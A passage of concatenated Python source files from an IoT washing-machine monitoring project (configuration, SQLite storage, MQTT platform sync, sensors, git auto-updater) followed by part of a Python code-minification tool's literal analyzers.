if __name__ == '__main__':
main()
``` |
{
"source": "Jochen-TPO/internet-of-washingmachines",
"score": 2
} |
#### File: Jochen-TPO/internet-of-washingmachines/config.py
```python
import os
import json
import base_config
from typing import List, Dict
class Config:
def __init__(self):
self.root_dir: str = os.path.dirname(os.path.abspath(__file__))
self.logEnabled: bool = False
self.updateBranch: str = ''
self.sqlitePath: str = ''
self.modelPath: str = ''
self.zones: List[Dict] = []
self.deviceId: str = ''
self.projectId: str = '<KEY>'
self.screenUpdateInterval: float = 0.3
self.eventSyncInterval: float = 0.5
self.stateSyncInterval: float = 600
self.mqtt_endpoint: str = base_config.ENDPOINT
self.mqtt_crt_path: str = base_config.CRT_PATH
self.mqtt_key_path: str = base_config.KEY_PATH
self.mqtt_root_pem_path: str = base_config.ROOT_PEM
self.config_file_path: str = base_config.CONFIG_FILE
self.logging_file_path: str = base_config.LOGGING_FILE
self.dry_config_file_path: str = base_config.DRY_CONFIG_FILE
self.upload_folder_path: str = base_config.UPLOAD_FOLDER_PATH
self.registration_url: str = base_config.REGISTRATION_URL
self.logging_levels: List = base_config.LOGGING_LEVELS
self.logging_error: int = base_config.LOGGING_ERROR
self.logging_info: int = base_config.LOGGING_INFO
self.logging_debug: int = base_config.LOGGIN_DEBUG
self.MQTTLoggingLevel: int = 1
self.screenLoggingLevel: int = 3
self.screenLoggingRejectionList: List[str] = []
self.MQTTLoggingRejectionList: List[str] = ["MQTT"]
self.MQTTLogRateLimiter: int = 5
self.screenLogRateLimiter: int = 20
self.topicPrefix: str = "/"
self.platformApiUrl: str = "https://platform-test.edgise.com/api/"
self.uploaderInterval: float = 2
self.main_filename: str = "main.py"
self.main_file_path: str = f"{self.root_dir}/{self.main_filename}"
self.cronosLoginUrl: str = ''
self.cronosIncreaseUrl: str = ''
self.cronosDecreaseUrl: str = ''
self.cronosGetStatsUrl: str = ''
self.cronosGetLocationUrl: str = ''
self.cronosUsername: str = ''
self.cronosPassword: str = ''
# fetch full dry config
self.load_config_from_file(self.dry_config_file_absolute_path)
# load from dedicated device config what is possible
self.load_config_from_file(self.config_file_absolute_path)
@property
def upload_folder_absolute_path(self) -> str:
return f"{self.root_dir}/{self.upload_folder_path}"
@property
def project_id(self) -> str:
return self.projectId
@property
def device_id(self) -> str:
return self.deviceId
@property
def uploader_interval(self) -> float:
return self.uploaderInterval
@property
def mqtt_log_rate_limiter(self) -> int:
return self.MQTTLogRateLimiter
@property
def screen_log_rate_limiter(self) -> int:
return self.screenLogRateLimiter
@property
def mqtt_logging_level(self) -> int:
return self.MQTTLoggingLevel
@property
def screen_logging_level(self) -> int:
return self.screenLoggingLevel
@property
def mqtt_logging_rejection_list(self) -> List[str]:
return self.MQTTLoggingRejectionList
@property
def screen_logging_rejection_list(self) -> List[str]:
return self.screenLoggingRejectionList
@property
def platform_api_url(self):
return self.platformApiUrl
@property
def file_upload_url(self) -> str:
ret = None
if self.has_project_id and self.has_device_id:
ret = f"{self.platform_api_url}projects/{cfg.projectId}/devices/{cfg.deviceId}/files"
return ret
@property
def has_device_id(self) -> bool:
return True if self.deviceId != '' else False
@property
def update_branch(self) -> str:
return self.updateBranch
@property
def has_project_id(self) -> bool:
return True if self.projectId != '' else False
@property
def ai_model_absolute_path(self) -> str:
return f"{self.root_dir}/{self.modelPath}"
@property
def mqtt_crt_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_crt_path}"
@property
def mqtt_key_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_key_path}"
@property
def mqtt_root_pem_absolute_path(self) -> str:
return f"{self.root_dir}/{self.mqtt_root_pem_path}"
@property
def config_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.config_file_path}"
@property
def logging_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.logging_file_path}"
@property
def dry_config_file_absolute_path(self) -> str:
return f"{self.root_dir}/{self.dry_config_file_path}"
@property
def screen_update_interval(self) -> float:
return self.screenUpdateInterval
@property
def event_sync_interval(self) -> float:
return self.eventSyncInterval
@property
def state_sync_interval(self) -> float:
return self.stateSyncInterval
@property
def full_sqlite_path(self) -> str:
# If the path starts with 'tmp', this means we want to run the database in a tmpfs memory directory,
# and since /tmp is mounted as tmpfs, we use this
if self.sqlitePath.startswith("tmp"):
return f"sqlite:////{self.sqlitePath}"
if self.sqlitePath != '':
ret = f"sqlite:///{self.root_dir}/{self.sqlitePath}"
else:
ret = "sqlite:///:memory:"
return ret
@property
def mqtt_event_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/events"
return ret
@property
def mqtt_count_topic(self) -> str:
ret = None
if self.projectId != '':
ret = f"dt/projects/{self.projectId}/counting"
return ret
@property
def mqtt_config_topic(self) -> str:
ret = None
if self.deviceId != '':
ret = f"cfg/devices/{self.deviceId}"
return ret
@property
def mqtt_cmd_topic(self):
ret = None
if self.projectId != '':
ret = f"cmd{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}"
return ret
@property
def mqtt_state_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/state"
return ret
@property
def mqtt_log_topic(self) -> str:
ret = None
if self.deviceId != '' and self.projectId != '':
ret = f"dt{self.topicPrefix}projects/{self.projectId}/devices/{self.deviceId}/logs"
return ret
def update_config_with_dict(self, config_dict: Dict):
"""
Update the config file with the JSON dict received
:param config_dict:
:return: None
"""
for key in self.__dict__.keys():
if key in config_dict.keys():
if config_dict[key] is not None and config_dict[key] != '' or \
key == 'updateBranch' or \
key == 'sqlitePath':
self.__dict__[key] = config_dict[key]
self.write_config_to_file()
def write_config_to_file(self):
"""
Save current config to file
:return: None
"""
with open(self.config_file_absolute_path, 'w+') as f:
json.dump(self.__dict__, f)
def load_config_from_file(self, file_path: str) -> bool:
"""
Load config parameters from file
:param file_path: path to config file
:return: True if file exists
"""
if os.path.exists(file_path):
with open(file_path, 'r') as f:
config_dict = json.load(f)
for key in self.__dict__.keys():
if key in config_dict.keys():
self.__dict__[key] = config_dict[key]
return True
else:
return False
cfg = Config()
```
#### File: src/database/__init__.py
```python
import sqlalchemy as db
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import func
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
Base = declarative_base()
from .movement import Movement
from .platform_sync import PlatformSync
from sqlalchemy.sql import exists
from typing import List
from os import path
from src.log import logger
from config import cfg
class DbManager:
def __init__(self):
self.engine = create_engine(cfg.full_sqlite_path, connect_args={'timeout': 60})
if not path.exists(f"{cfg.root_dir}/{cfg.sqlitePath}") or \
cfg.full_sqlite_path == "sqlite://" or \
cfg.full_sqlite_path == "sqlite:///:memory:":
# 2 - generate database schema
logger.info(f"[DB] DB non existent : creating @ {cfg.full_sqlite_path}")
Base.metadata.create_all(bind=self.engine)
self.session_factory = sessionmaker(bind=self.engine)
self.Session = scoped_session(self.session_factory)
def close(self):
self.Session.close()
self.engine.dispose()
def get_engine(self):
return self.engine
def get_session(self):
return self.Session()
def get_entered(self):
""" Get number of people entered that have not been synced yet """
s = self.get_session()
n_in = s.query(func.count()).filter(Movement.entered == True).scalar()
return n_in
def get_left(self):
""" Get number of people left that have not been synced yet """
s = self.get_session()
n_out = s.query(func.count()).filter(Movement.entered == False).scalar()
return n_out
def stuff_single_entry(self, entered: bool):
""" Add sample to local DB with 1 entered or left"""
s = self.get_session()
ids_sample = Movement()
ids_sample.entered = entered
s.add(ids_sample)
s.commit()
def get_unsynced(self):
"""
Get all records that exist in the Movemenbt table, but not in the PlatformSync table
:return: List[records]
"""
s = self.get_session()
unsynced_data = s.query(Movement).filter(
~exists().where(Movement.id == PlatformSync.idm)) \
.order_by(Movement.timestamp.asc()).all()
return unsynced_data
def update_synced(self, idms: List[int]):
"""
Add the Movement ID's to PlatformSync table
:param idms: List of ID's to add
:return: None
"""
s = self.get_session()
for id in idms:
tmp = PlatformSync()
tmp.idm = id
s.add(tmp)
s.commit()
```
#### File: src/edgise_logger/__init__.py
```python
from multiprocessing import Process, Queue, Event
from typing import Dict
from datetime import datetime
import queue
import time
from config import cfg
import json
class EdgiseLogger(Process):
"""
A asynchroneous logger with rate limiting
"""
def __init__(self,
stop_event: Event,
incoming_q: Queue,
outgoing_q: Queue = None,
outgoing_method: str = "json",
print_to_screen: bool = True,):
super(EdgiseLogger, self).__init__()
self._incoming_q: Queue = incoming_q
self._outgoing_q: Queue = outgoing_q
self._outgoing_method: str = outgoing_method
self._print_to_screen: bool = print_to_screen
self._stop_event: Event = stop_event
self._screen_rate_limit: int = cfg.screen_log_rate_limiter
self._mqtt_rate_limit: int = cfg.mqtt_log_rate_limiter
self._allowance_screen: float = self._screen_rate_limit
self._allowance_mqtt: float = self._mqtt_rate_limit
self._last_screen_msg: float = time.time()
self._last_mqtt_msg: float = time.time()
self._dropped_screen_msg_count: int = 0
self._dropped_mqtt_msg_count: int = 0
self._last_screen_rate_limiter_print: float = time.time()
self._last_mqtt_rate_limiter_print: float = time.time()
@property
def dropped_msg_count(self):
return self._dropped_screen_msg_count
@property
def incoming_q(self) -> Queue:
return self._incoming_q
@incoming_q.setter
def incoming_q(self, value: Queue):
self._incoming_q = value
@property
def outgoing_q(self) -> Queue:
return self._outgoing_q
@outgoing_q.setter
def outgoing_q(self, value: Queue):
self._outgoing_q = value
@property
def outgoing_method(self) -> str:
return self.outgoing_method
@outgoing_method.setter
def outgoing_method(self, value: str):
self._outgoing_method = value
@property
def print_to_screen(self) -> bool:
return self._print_to_screen
@print_to_screen.setter
def print_to_screen(self, value: bool):
self._print_to_screen = value
@property
def stop_event(self) -> Event:
return self._stop_event
def get_dropped_msg_count(self) -> int:
return self.dropped_msg_count
def create_output_line(self, level: int, sender: str, msg: str) -> str:
try:
timestr: str = datetime.now().strftime("%m/%d/%Y %H:%M:%S")
out = f"{cfg.logging_levels[level]}:({timestr}) [{sender}] {msg}"
except Exception as e:
self.display(self.create_output_line(cfg.logging_error,
'LOG',
f"Error in create_output_line with (lvl, sender, message):({level}, {sender}, {msg}) : {str(e)}"))
out = ""
return out
def print_screen_rate_limiter(self):
"""
Prints the rate limiting messages
:return: None
"""
if self._dropped_screen_msg_count > 0:
self.output(cfg.logging_info,
'LOG',
f"Screen rate limiter dropped {self._dropped_screen_msg_count} messages in the last second")
self._dropped_screen_msg_count = 0
self._last_screen_rate_limiter_print = time.time()
def print_mqtt_rate_limiter(self):
"""
Prints the rate limiting messages
:return: None
"""
if self._dropped_mqtt_msg_count > 0:
self.output(cfg.logging_info,
'LOG',
f"MQTT rate limiter dropped {self._dropped_mqtt_msg_count} messages in the last second")
self._dropped_mqtt_msg_count = 0
self._last_mqtt_rate_limiter_print = time.time()
def display(self, msg: str):
"""
Prints the messages to screen
:param msg: the message to print
:return: none
"""
if self.print_to_screen:
# Check how long it has been since last message
now = time.time()
time_passed = now - self._last_screen_msg
# Update the time of the last message
self._last_screen_msg = now
# Update the allowance of messages to the screen, and cap it
self._allowance_screen += time_passed * float(self._screen_rate_limit)
if self._allowance_screen >= self._screen_rate_limit:
self._allowance_screen = self._screen_rate_limit
# Check if we can still print a message, if so, print it, else, drop it
if self._allowance_screen >= 1.0:
print(msg)
self._allowance_screen -= 1.0
else:
self._dropped_screen_msg_count += 1
def send_to_mqtt(self, level: int, sender: str, msg: str):
"""
Prints the messages to mqtt
:param level: level -> 0=error, 1=info, 2=debug
:param sender: sender
:param msg: message to send
:return: none
"""
# Check how long it has been since last message
now = time.time()
time_passed = now - self._last_mqtt_msg
# Update the time of the last message
self._last_mqtt_msg = now
# Update the allowance of messages to the screen, and cap it
self._allowance_mqtt += time_passed * float(self._mqtt_rate_limit)
if self._allowance_mqtt >= self._mqtt_rate_limit:
self._allowance_mqtt = self._mqtt_rate_limit
# Check if we can still print a message, if so, print it, else, drop it
if self._allowance_mqtt >= 1.0:
out_msg = {"level": cfg.logging_levels[level], "sender": sender, "message": msg}
self.outgoing_q.put({"log": json.dumps(out_msg)})
self._allowance_mqtt -= 1.0
else:
self._dropped_mqtt_msg_count += 1
def output(self, level: int, sender: str, msg: str):
if sender not in cfg.screen_logging_rejection_list and cfg.screen_logging_level > level:
self.display(self.create_output_line(level, sender, msg))
if sender not in cfg.mqtt_logging_rejection_list and cfg.mqtt_logging_level > level and sender != 'MQTT':
self.send_to_mqtt(level, sender, msg)
def run(self) -> None:
self.output(cfg.logging_info, "LOG", "Logger is live!")
while not self._stop_event.is_set():
try:
incoming_data: Dict = self.incoming_q.get_nowait()
for level, [sender, msg] in incoming_data.items():
self.output(level, sender, msg)
except queue.Empty:
self._stop_event.wait(timeout=0.01)
except Exception as e:
self.output(cfg.logging_error, "LOG", f"Error in run : {str(e)}")
if time.time() - self._last_screen_rate_limiter_print > 1.0:
self.print_screen_rate_limiter()
if time.time() - self._last_mqtt_rate_limiter_print > 1.0:
self.print_mqtt_rate_limiter()
while not self._incoming_q.empty():
try:
tmp = self._incoming_q.get_nowait()
except queue.Empty:
pass
while not self._incoming_q.empty():
try:
tmp = self._outgoing_q.get_nowait()
except queue.Empty:
pass
self._incoming_q.close()
self._outgoing_q.close()
self.output(cfg.logging_info,
'LOG',
"Quitting.")
```
#### File: src/platform_sync/__init__.py
```python
import time
from config import cfg
from src.database import DbManager
from threading import Thread, Event
from awscrt import io, mqtt, auth, http
from awsiot import mqtt_connection_builder
import json
import sys
import os
from typing import Dict
from src.log import logger
from queue import Queue
class CountData:
entered: bool = True
timestamp: int = 0
class StateData:
temperature: float = 15.0
class PlatformProcess(Thread):
def __init__(self, stop_event: Event, data_q: Queue, cmd_q: Queue, count_interval: float = 2, state_interval: float = 120):
self._stop_event = stop_event
# self._count_interval = count_interval
# self._state_interval = state_interval # not actually used yet
self._data_q: Queue = data_q
self._cmd_q: Queue = cmd_q
self._db_manager = DbManager()
self._connected = False
self._mqtt_connection = None
self._mqtt_connected = False
super().__init__()
def on_counting_message_received(self, topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] counting received @ {topic} : {payload}")
n_max = config_dict['maxAllowed']
n_estimated = config_dict['actualCount']
self._data_q.put({'n_max': n_max, 'n_estimated': n_estimated})
def on_cmd_message_received(self, topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] command received @ {topic} : {payload}")
cmd = config_dict['type']
if cmd == "UPLOAD":
self._cmd_q.put(cmd)
def send_state(self, data: StateData):
payload = json.dumps(data.__dict__)
logger.info(f"[MQTT] state to topic '{cfg.mqtt_state_topic}': {payload}")
self._mqtt_connection.publish(
topic=cfg.mqtt_state_topic,
payload=payload,
qos=mqtt.QoS.AT_LEAST_ONCE)
@staticmethod
def get_temperature() -> float:
platform = os.uname()
if platform[1] == "raspberrypi":
try:
tmp: str = os.popen("/opt/vc/bin/vcgencmd measure_temp").readline()
tmp = tmp.split("=")[-1]
return float(tmp.split("'")[0])
except Exception as e:
logger.error(f"[MQTT][get_temperature] {e}")
else:
return 15.0
def run(self) -> None:
"""
TODO: Check if we can have longer keepalive on MQTT
:return:
"""
# Spin up mqtt resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
counter = 0
while not self._stop_event.is_set():
if not self._mqtt_connected:
while not cfg.has_device_id:
logger.info(f"[MQTT] No device_id set yet, sleeping for {cfg.eventSyncInterval} sec")
time.sleep(cfg.eventSyncInterval)
try:
self._mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=cfg.mqtt_endpoint,
cert_filepath=cfg.mqtt_crt_absolute_path,
pri_key_filepath=cfg.mqtt_key_absolute_path,
client_bootstrap=client_bootstrap,
ca_filepath=cfg.mqtt_root_pem_absolute_path,
on_connection_interrupted=on_connection_interrupted,
on_connection_resumed=on_connection_resumed,
client_id=cfg.deviceId,
clean_session=False,
keep_alive_secs=15)
connect_future = self._mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
self._mqtt_connected = True
logger.info(f"[MQTT] Connected")
logger.info(f"[MQTT] Subscribing to config messages")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_config_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_config_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_state_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
# Log the error, sleep for a while, and go to the next loop
logger.error(f"[MQTT] error on connection or subscibtion occured : {e}")
time.sleep(cfg.eventSyncInterval)
continue
while not cfg.has_project_id:
logger.info(f"[MQTT] No project_id yet, sleeping for {cfg.eventSyncInterval} sec")
time.sleep(cfg.eventSyncInterval)
#SUBSRIBE TO COUNTING MESSAGES
try:
logger.info(f"[MQTT] Subscribing to counting messages")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_count_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=self.on_counting_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_count_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
logger.error(f"[MQTT] Error on subscription to counting : {e}")
#SUBSRIBE TO COMMAND MESSAGES
try:
logger.info(f"[MQTT] Subscribing to command topic")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_cmd_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=self.on_cmd_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_cmd_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
logger.error(f"[MQTT] Error on subscription to command topic : {e}")
if self._mqtt_connected:
unsynced_data = self._db_manager.get_unsynced()
synced_ids = []
for unsynced_record in unsynced_data:
data = CountData()
data.entered = unsynced_record.entered
data.timestamp = unsynced_record.timestamp
message = json.dumps(data.__dict__)
logger.info(f"[MQTT] Publishing count to topic '{cfg.mqtt_event_topic}' : {message}")
self._mqtt_connection.publish(
topic=cfg.mqtt_event_topic,
payload=message,
qos=mqtt.QoS.AT_LEAST_ONCE)
synced_ids.append(unsynced_record.id)
self._db_manager.update_synced(synced_ids)
# dirty af, but quicky testy
counter += 1
if counter >= int(cfg.stateSyncInterval / cfg.eventSyncInterval):
counter = 0
state_data = StateData()
state_data.temperature = self.get_temperature()
self.send_state(state_data)
time.sleep(cfg.eventSyncInterval)
logger.info(f"[MQTT] stopping thread")
# Callback when connection is accidentally lost.
def on_connection_interrupted(connection, error, **kwargs):
logger.info(f"[MQTT] Connection interrupted. error: {error}")
def on_config_message_received(topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] Config received @ {topic} : {payload}")
cfg.update_config_with_dict(config_dict)
if 'deviceConfig' in config_dict.keys():
try:
if config_dict['deviceConfig']['pipeline'][0]['name'] == 'TELLY' and \
config_dict['deviceConfig']['pipeline'][0]['type'] == 'CONFIG':
logger.info(f"[MQTT] Saving new config")
cfg.update_config_with_dict(config_dict['deviceConfig']['pipeline'][0]['properties'])
except TypeError as e:
logger.error(f"[MQTT] New config : Received TypeError {e} -- This might be normal when no platform configuration has been set yet")
except Exception as e:
logger.error(f"[MQTT] New config : Received unknown exception {e}")
# Callback when an interrupted connection is re-established.
def on_connection_resumed(connection, return_code, session_present, **kwargs):
logger.info(f"[MQTT] Connection resumed. return code: {return_code}, session_present: {session_present}")
if return_code == mqtt.ConnectReturnCode.ACCEPTED and not session_present:
logger.info(f"[MQTT] Session did not persist, Resubscribing to topics...")
resubscribe_future, _ = connection.resubscribe_existing_topics()
# Cannot synchronously wait for resubscribe result because we're on the connection's event-loop thread,
# evaluate result with a callback instead.
resubscribe_future.add_done_callback(on_resubscribe_complete)
def on_resubscribe_complete(resubscribe_future):
resubscribe_results = resubscribe_future.result()
logger.info(f"[MQTT] Resubscribe results: {resubscribe_results}")
for topic, qos in resubscribe_results['topics']:
if qos is None:
sys.exit("Server rejected resubscribe to topic: {}".format(topic))
# Callback when the subscribed topic receives a message
def on_message_received(topic, payload, **kwargs):
logger.info(f"[MQTT] Received message on unknown topic {topic} : {payload}")
```
#### File: sensor/electricity/__init__.py
```python
import time
import json
from math import sqrt
from typing import List
from multiprocessing import Process, Event, Queue, Lock
from src.base import EdgiseBase
from grove.adc import ADC
from config import cfg
import json
class ACSensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, input_q: Queue, output_q: Queue,
config_dict, resource_lock: Lock, **kwargs):
self._stop_event = stop_event
self._logging_q: Queue = logging_q
self._input_q: Queue = input_q
self._output_q: Queue = output_q
self.RMS_voltage = 230
self.VCC = 5
self._config_dict = config_dict
self._name = self._config_dict['name']
self.adc = ADC()
self.i2c_lock = resource_lock
Process.__init__(self)
EdgiseBase.__init__(self, name=self._name, logging_q=logging_q)
# config = {
# "name":str
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
def read_sensor(self):
sensor_value = self.adc.read(self._config_dict['pin'])
return sensor_value
def amplitude_current(self, sensor_value):
return float(sensor_value / 1024 * self.VCC / 800 * 2000000)
def RMS_current(self, amplitude_current):
return amplitude_current / sqrt(2)
def avg_power_consumption(self, RMS_current):
return self.RMS_voltage * RMS_current
def run(self) -> None:
self.info("Starting AC sensor")
print(self._config_dict['name'])
while not self._stop_event.is_set():
self.i2c_lock.acquire()
try:
raw_val = self.read_sensor()
finally:
self.i2c_lock.release()
self.info("Raw Value: {}".format(raw_val))
amplitude_current = self.amplitude_current(raw_val)
self.info("A I Value: {}".format(amplitude_current))
rms_current = self.RMS_current(amplitude_current)
self.info("RMS I Value: {}".format(rms_current))
avg_power = self.avg_power_consumption(rms_current)
self.info("AVG W Value: {}".format(avg_power))
data = {'electricitySensorData': {
'rawVal': raw_val,
'currentAmp': amplitude_current,
'rmsCurrent': rms_current,
'avgPower': avg_power
}}
measurement = {'data': data}
self._output_q.put_nowait({'event': json.dumps(measurement)})
time.sleep(10)
```
#### File: src/sensor/__init__.py
```python
from multiprocessing import Process, Event, Queue
from src.base import EdgiseBase
import abc
class Sensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, input_q: Queue, output_q: Queue, name: str, config: dict):
self._sensor_name: str = name
self._config:dict = config
self._logging_q: Queue = logging_q
self._input_q: Queue = input_q
self._output_q: Queue = output_q
Process.__init__(self, name=name)
EdgiseBase.__init__(self, name=name, logging_q=logging_q)
# config = {
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
@abc.abstractmethod
def read_sensor(self):
pass
@abc.abstractmethod
def run(self) -> None:
pass
```
#### File: sensor/waterflow/__init__.py
```python
import json
from multiprocessing import Process, Event, Queue, Lock
from src.base import EdgiseBase
import RPi.GPIO as GPIO
import time
def count_sensor_pulse(counter_tuple):
if counter_tuple[0]:
counter_tuple[1] += 1
class WaterflowSensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, output_q: Queue,
config_dict, **kwargs):
self._stop_event = stop_event
self._logging_q: Queue = logging_q
self._output_q: Queue = output_q
self._config_dict = config_dict
self._name = self._config_dict['name']
self.pulse_count = 0
self.start_counter = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(self._config_dict['Pin'], GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.add_event_detect(self._config_dict['Pin'], GPIO.FALLING,
callback=lambda x: count_sensor_pulse((self.start_counter, self.pulse_count)))
Process.__init__(self)
EdgiseBase.__init__(self, name=self._name, logging_q=logging_q)
# config = {
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
def run(self) -> None:
self.info("Starting Waterflow sensor")
while not self._stop_event.is_set():
self.start_counter = 1
time.sleep(1)
self.start_counter = 0
raw_val = self.pulse_count
flow_s = (raw_val / 396)
flow_min = (raw_val / 6.6)
flow_h = (raw_val * 60) / 6.6
self.pulse_count = 0
self.info("rawVal: {}".format(raw_val))
self.info("flowSec: {}".format(flow_s))
self.info("flowMin: {}".format(flow_min))
self.info("flowHour: {}".format(flow_h))
data = {'waterflowSensorData': {
'rawVal': raw_val,
'flowSec': flow_s,
'flowMin': flow_min,
'flowHour': flow_h
}}
measurement = {'data': data}
self._output_q.put_nowait({'event': json.dumps(measurement)})
time.sleep(10)
```
#### File: src/update/__init__.py
```python
import os
import subprocess
import time
from config import cfg
# from src.log import logger
from threading import Thread
import queue
from src.base import EdgiseBase
from multiprocessing import Queue, Event
class UpdateWatcher(Thread, EdgiseBase):
def __init__(self, stop_event: Event, cmd_q: Queue, logging_q: Queue):
self._stop_event = stop_event
self._cmd_q = cmd_q
Thread.__init__(self)
EdgiseBase.__init__(self, name="UPDATE", logging_q=logging_q)
def check_update(self):
# Initialization
branch = cfg.updateBranch
cmd_git_diff = ['/usr/bin/git', 'diff', '--name-only', f'{branch}', f'origin/{branch}']
cmd_git_pull = ['/usr/bin/git', 'pull']
cmd_git_fetch = ['/usr/bin/git', 'fetch', '--all']
cmd_git_branch = ['/usr/bin/git', 'branch']
cmd_git_deploy = ['/usr/bin/git', 'checkout', branch]
cmd_git_reset = ['/usr/bin/git', 'reset', '--hard']
output_git_diff = 0
# make sure we are on branch deploy
try:
os.chdir(cfg.root_dir)
subprocess.Popen(cmd_git_reset)
subprocess.Popen(cmd_git_fetch)
subprocess.Popen(cmd_git_deploy)
except Exception as e:
self.error(f'GIT reset/fetch/deploy error : {e}')
time.sleep(5)
# Check if update is necessary
try:
output_git_diff = subprocess.check_output(cmd_git_diff)
except Exception as e:
self.error(f'GIT diff error : {e}')
if len(output_git_diff) == 0:
self.info('Branch is up to date')
else:
self.info('Branch needs pull')
try:
output_git_pull = subprocess.check_output(cmd_git_pull)
self.info(output_git_pull)
self.error("Device updated, can be restarted")
except Exception as e:
self.error(f'GIT pull error : {e}')
def run(self) -> None:
while not self._stop_event.is_set():
time.sleep(0.1)
cmd = ""
try:
cmd = self._cmd_q.get_nowait()
except queue.Empty:
pass
if cmd == "UPDATE":
if cfg.updateBranch:
self.info("Update command received")
self.check_update()
else:
self.info(f"No update branch set, not updating")
self.info(f"Quitting.")
``` |
{
"source": "jochenvdv/snakepack",
"score": 2
} |
#### File: analyzers/python/_base.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Union, Mapping, Iterable, Optional
from boltons.iterutils import flatten
from libcst import MetadataWrapper
from snakepack.analyzers import Analyzer
from snakepack.analyzers._base import SubjectAnalyzer
from snakepack.assets import Asset, AssetGroup
from snakepack.assets.python import PythonModule
class PythonModuleCstAnalyzer(SubjectAnalyzer, ABC):
@abstractmethod
def analyse_subject(self, subject: Union[Asset, AssetGroup]) -> Analysis:
raise NotImplementedError
CST_PROVIDERS = set()
def create_analysis(
self,
metadata: Mapping[PythonModule, MetadataWrapper]
) -> PythonModuleCstAnalyzer.Analysis:
return self.Analysis(metadata=metadata)
class Analysis(Analyzer.Analysis):
def __init__(self, metadata: MetadataWrapper):
self._metadata = metadata
def __getitem__(self, item):
return self._metadata[item]
__config_name__ = NotImplemented
class BatchPythonModuleCstAnalyzer(SubjectAnalyzer):
def __init__(self, analyzers: Iterable[PythonModuleCstAnalyzer]):
self._analyzers = analyzers
def analyse_subject(self, subject) -> Mapping[PythonModuleCstAnalyzer, PythonModuleCstAnalyzer.Analysis]:
providers = set(flatten(map(lambda x: x.CST_PROVIDERS, self._analyzers)))
modules_metadata = subject.content.metadata_wrapper.resolve_many(providers)
analyses = {}
for analyzer in self._analyzers:
analysis = analyzer.create_analysis(modules_metadata)
analyses[analyzer.__class__] = analysis
return analyses
```
#### File: analyzers/python/literals.py
```python
from __future__ import annotations
import functools
from typing import Union, Optional, Tuple, Dict, Iterable, Sequence, List, Set
from boltons.iterutils import first, flatten
from libcst import MetadataWrapper, Assign, AnnAssign, SimpleString, VisitorMetadataProvider, AugAssign, Name, \
BaseExpression, ConcatenatedString, CSTNode
from libcst.metadata import ScopeProvider, ExpressionContextProvider, ParentNodeProvider, Scope, GlobalScope
from snakepack.analyzers import Analyzer
from snakepack.analyzers.python import PythonModuleCstAnalyzer
from snakepack.assets import Asset, AssetGroup
from snakepack.assets.python import PythonModule, PythonModuleCst
class LiteralDuplicationAnalyzer(PythonModuleCstAnalyzer):
def analyse_subject(self, subject: Union[Asset, AssetGroup]) -> LiteralDuplicationAnalyzer.Analysis:
if isinstance(subject, PythonModule):
metadata = subject.content.metadata_wrapper.resolve_many(self.CST_PROVIDERS)
return self.create_analysis(metadata)
else:
raise NotImplementedError
class Analysis(PythonModuleCstAnalyzer.Analysis):
@functools.lru_cache()
def get_occurrences(self, literal_node: SimpleString) -> Optional[int]:
if literal_node not in self._metadata[LiteralDuplicationAnalyzer._LiteralDuplicationCountProvider]:
return None
return self._metadata[LiteralDuplicationAnalyzer._LiteralDuplicationCountProvider][literal_node]
@functools.lru_cache()
def is_part_of_concatenated_string(self, literal_node: SimpleString) -> bool:
return isinstance(self._metadata[ParentNodeProvider][literal_node], ConcatenatedString)
@functools.lru_cache()
def get_preceding_assignments(
self,
literal_node: SimpleString,
scope: Scope
) -> Dict[str, Sequence[Union[Assign, AnnAssign, AugAssign]]]:
for literal, assignments in self._metadata[LiteralDuplicationAnalyzer._LiteralAssignmentProvider].items():
if literal_node.value == literal.value:
return {
key: value
for key, value in assignments.items()
if key in scope
}
return None
class _LiteralDuplicationCountProvider(VisitorMetadataProvider[int]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
